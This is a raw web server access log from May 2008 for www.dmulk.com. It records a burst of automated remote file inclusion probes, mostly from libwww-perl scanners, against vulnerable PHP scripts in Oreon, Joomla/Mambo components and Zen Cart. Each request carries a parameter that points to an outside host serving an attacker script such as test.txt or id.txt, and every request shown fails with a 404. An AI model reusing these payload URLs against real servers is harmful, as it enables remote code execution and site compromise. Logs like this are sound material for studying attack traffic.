208.71.129.241 - - [19/May/2008:09:36:24 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
208.71.129.241 - - [19/May/2008:09:36:24 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.38.4.3 - - [19/May/2008:09:36:34 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
64.38.4.3 - - [19/May/2008:09:36:34 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://jikustik.t35.com/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
61.63.9.163 - - [19/May/2008:09:36:40 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://arai.web.id/jek/bot/dodol.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:09:37:03 -0700] "GET /logs/access.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:09:37:03 -0700] "GET /logs/access.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:09:37:04 -0700] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:09:37:04 -0700] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:09:37:04 -0700] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.219.173.57 - - [19/May/2008:09:37:04 -0700] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:37:10 -0700] "GET /logs/access.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:37:10 -0700] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:37:11 -0700] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:37:13 -0700] "GET /logs/access.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:37:13 -0700] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:37:13 -0700] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:37:15 -0700] "GET /logs/access.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:37:15 -0700] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:37:16 -0700] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://glycol.ca/languages/.../klenk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.158.238.99 - - [19/May/2008:09:37:16 -0700] "GET /logs/index2.php?x=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.158.238.99 - - [19/May/2008:09:37:16 -0700] "GET /index2.php?x=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.203.6 - - [19/May/2008:09:37:25 -0700] "GET /logs/access_080218.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.239.157.171 - - [19/May/2008:09:37:34 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://fadhilla.net/test.txt? HTTP/1.1" 40